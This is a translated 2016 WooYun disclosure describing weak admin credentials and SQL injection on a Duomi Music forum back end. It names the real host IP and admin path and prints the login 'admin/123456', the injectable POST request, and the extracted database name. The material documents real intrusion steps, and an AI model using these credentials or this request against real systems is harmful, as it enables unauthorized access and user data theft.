
Vulnerability summary

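Vulnerability ID: wooyun-2016-0186995

Vulnerability title: Flaw in a Duomi Music admin back end plus SQL injection leads to large-scale disclosure of user information

Vendor: Duomi Music

Author: fuzz-ing

Submitted: 2016-03-22 13:38

Fixed: 2016-05-06 13:38

Publicly disclosed: 2016-05-06 13:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]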



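Vulnerability details

Disclosure status:

2016-03-22: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-05-06: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

..

Detailed description:

The vendor quietly fixed the earlier vulnerabilities and then switched to a different system, but it made no difference.

Actually, I did not look at the earlier vulnerabilities; I came across this by chance: http://59.151.12.39/admin/PostsManager/NewPostsList.aspx
After logging in with the weak credentials admin / 123456, I found a lot of information, including the latest data with all kinds of moderation permissions; I won't go into that here.
Then there is an injection here: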



POST /admin/PostsManager/PostsHandler.ashx?action=GetNewList HTTP/1.1
Host: 59.151.12.39
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://59.151.12.39/admin/PostsManager/NewPostsList.aspx
Content-Length: 82
Cookie: ASP.NET_SessionId=vq0povionfnoujdgm2bylkxx
Connection: close

title=1&startTime=2016%2F03%2F19&endTime=2016%2F03%2F20&status=0&start=0&length=10


The current database; the name alone tells you the volume of data is large:
current database: 'fans_bbs'

Proof of vulnerability:

current database: 'fans_bbs'

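Remediation:

Fix it quietly

Copyright notice: when reposting, please credit the source fuzz-ing@WooYun


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined

Vulnerability Rank: 15 (WooYun rating)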